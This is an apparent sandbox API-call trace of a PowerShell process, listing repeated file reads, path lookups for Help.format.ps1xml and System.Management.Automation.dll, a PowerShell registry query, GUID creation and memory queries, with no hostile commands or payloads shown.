	[0111.693] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.694] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.694] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.694] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.694] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.694] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.694] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.695] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.695] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.695] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.695] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.695] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.695] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0xf37, lpOverlapped=0x0) returned 1
	[0111.696] ReadFile (in: hFile=0x330, lpBuffer=0x3651c07, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3651c07*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.696] ReadFile (in: hFile=0x330, lpBuffer=0x3652568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3652568*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.696] CloseHandle (hObject=0x330) returned 1
	[0111.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0111.696] SetErrorMode (uMode=0x1) returned 0x1
	[0111.696] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0111.696] SetErrorMode (uMode=0x1) returned 0x1
	[0111.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0111.696] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x330) returned 0x0
	[0111.697] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0111.697] CoTaskMemAlloc (cb=0x5a) returned 0x1b8515b0
	[0111.697] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b8515b0, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0111.697] CoTaskMemFree (pv=0x1b8515b0) 
	[0111.697] RegCloseKey (hKey=0x330) returned 0x0
	[0111.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0111.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0111.706] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x262a0bd, Data2=0xda73, Data3=0x4fd8, Data4=([0]=0x82, [1]=0xe3, [2]=0xc8, [3]=0xd2, [4]=0x8b, [5]=0xa9, [6]=0x7e, [7]=0xdf))) returned 0x0
	[0111.707] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf465efc7, Data2=0x5e9e, Data3=0x42d1, Data4=([0]=0xb6, [1]=0x6b, [2]=0xd0, [3]=0x63, [4]=0x4b, [5]=0x9b, [6]=0x10, [7]=0x7b))) returned 0x0
	[0111.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.731] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x8331262b, Data2=0xedb, Data3=0x415f, Data4=([0]=0xa7, [1]=0x90, [2]=0x2c, [3]=0x60, [4]=0xc4, [5]=0xc4, [6]=0xe5, [7]=0x8f))) returned 0x0
	[0111.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.733] VirtualQuery (in: lpAddress=0xcb220, lpBuffer=0xcc0e0, dwLength=0x30 | out: lpBuffer=0xcc0e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.733] VirtualQuery (in: lpAddress=0xcb2b0, lpBuffer=0xcc170, dwLength=0x30 | out: lpBuffer=0xcc170*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.734] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.735] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.735] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.736] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.736] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.737] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.737] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.737] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.737] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.738] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.738] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.738] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
